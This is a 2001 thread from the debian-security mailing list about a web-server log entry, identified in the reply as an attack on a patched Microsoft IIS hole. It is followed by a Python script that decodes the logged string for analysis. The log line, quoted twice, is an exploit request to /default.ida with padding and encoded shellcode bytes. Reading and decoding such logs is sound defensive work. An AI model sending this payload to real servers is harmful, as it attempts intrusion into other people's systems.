I'm sure that most of us have seen this by now in our logs:

> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a HTTP/1.0" 400 328

This is apparently an attack against a (patched) hole in Microsoft IIS, and doesn't have any impact other than a minor log annoyance on Apache users. ZDNet has a story regarding this:

http://www.zdnet.com/zdnn/stories/news/0,4586,5094345,00.html?chkpt=zdhpnews01

Josh

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Thursday, July 19, 2001 2:17 PM
> To: debian-security@lists.debian.org
> Subject: CGI Buffer Overflow?
>
> Anyone seen this before? I have looked around for similar attacks, but
> cannot find any info. I assume that is a unicode string padded out with
> Ns. How would I go about finding out what is in the string?
>
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a HTTP/1.0" 400 328
>
> --Brian
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
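One way to see what is in the logged string, added here as an example that is not part of either message: the script splits the request target into its padding run and its `%uXXXX` escapes, then prints the escapes as the bytes a little-endian host would store. The function name and the detection thresholds are assumptions, and the sample is the log line above with the mail's line wraps rejoined.

```python
import re

# Request target from the log line quoted in this thread, with the mail
# client's line wraps rejoined (the padding run is written as a repeat).
SAMPLE_TARGET = (
    "/default.ida?" + "N" * 224
    + "%u9090%u6858%ucbd3%u7801" * 3
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)

U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")  # IIS-style 16-bit escape
PAD_RUN = re.compile(r"(.)\1{63,}")           # assumed threshold: 64+ repeats


def analyze_target(target):
    """Summarise a logged request target; nothing is executed or emulated."""
    path, _, query = target.partition("?")
    pad = PAD_RUN.search(query)
    units = [int(h, 16) for h in U_ESCAPE.findall(query)]
    # Each %uXXXX is one 16-bit code unit; little-endian stores the low byte first.
    raw = b"".join(u.to_bytes(2, "little") for u in units)
    # What remains once well-formed escapes and the padding are removed,
    # e.g. a truncated escape at the end of the query.
    leftover = U_ESCAPE.sub("", query)
    if pad:
        leftover = leftover.replace(pad.group(0), "", 1)
    return {
        "path": path,
        "pad_char": pad.group(1) if pad else None,
        "pad_len": len(pad.group(0)) if pad else 0,
        "code_units": len(units),
        "bytes_hex": raw.hex(" "),
        "leftover": leftover,
        # Assumed heuristic: long single-character padding plus several escapes.
        "suspicious": bool(pad) and len(units) >= 4,
    }


if __name__ == "__main__":
    for key, value in analyze_target(SAMPLE_TARGET).items():
        print(f"{key:>10}: {value}")
```

The same function can be run over the request field of each access-log line to count how many hosts are sending this request.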